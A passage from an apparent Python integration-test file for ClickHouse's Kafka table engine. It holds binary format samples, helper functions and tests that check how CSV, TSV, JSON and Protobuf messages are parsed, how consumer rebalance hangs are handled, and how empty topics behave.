x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\
x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
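# For every format above: create a topic, produce the data samples
# (prepending an empty message when the format supports it), and create
# a Kafka table plus a materialized view that consumes from it.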
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
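# Once every consumer has committed its offsets, verify the content of each materialized view.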
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Unexpected result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
# Since receiving messages from Kafka is asynchronous and flaky,
# we may want to check the results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
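# Decode a raw Avro container-file message into a printable string, one record per line.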
def decode_avro(message):
b = io.BytesIO(message)
ret = avro.datafile.DataFileReader(b, avro.io.DatumReader())
output = io.StringIO()
for record in ret:
print(record, file=output)
return output.getvalue()
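# Hypothetical usage sketch: decode_avro(avro_message({'id': 0, 'blockNo': 0, 'val1': 'AM',
# 'val2': 0.5, 'val3': 1})) should return the decoded record as a single line of text.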
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
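# Example (sketch): describe_consumer_group(kafka_cluster, 'mv') returns a list of dicts,
# one per group member, with 'member_id', 'client_id', 'client_host' and the
# topic/partition 'assignment'.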
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter works, as part of the available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_commit_on_select = 1,
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang"
kafka_create_topic(admin_client, topic_name, num_partitions=8)
instance.query(f'''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
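# Wait until the consumers log that they are stalled (presumably nothing left to poll).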
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS
# and can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# The original problem showed up as the following sequence of messages in the librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback.
# From a user perspective we expect no hanging 'drop' queries.
# ('dr'||'op' is used so the check does not match its own query.)
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
# Clean up unread messages so Kafka does not wait for reading consumers before deleting the topic.
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
''')
num_read = int(instance.query('SELECT count() FROM test.kafka'))
logging.debug(f"read {num_read} from {topic_name} before delete")
instance.query('DROP TABLE test.kafka')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang2"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_commit_on_select = 1,
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# The first consumer subscribes to the topic, tries to poll some data, and then goes idle.
instance.query('SELECT * FROM test.kafka')
# The second consumer does the same, leading to a rebalance in the first
# consumer while it tries to poll some data.
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# The first consumer has a pending, unprocessed rebalance callback (no poll after the SELECT).
# One of these queries used to fail because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# From a user perspective we expect no hanging 'drop' queries.
# ('dr'||'op' is used so the check does not match its own query.)
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_commit_on_select = 1,
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_commit_on_select = 1,
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "empty"
kafka_create_topic(admin_client, topic_name)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_commit_on_select = 1,
kafka_group_name = '{topic_name}',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_commit_on_select = 1,
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
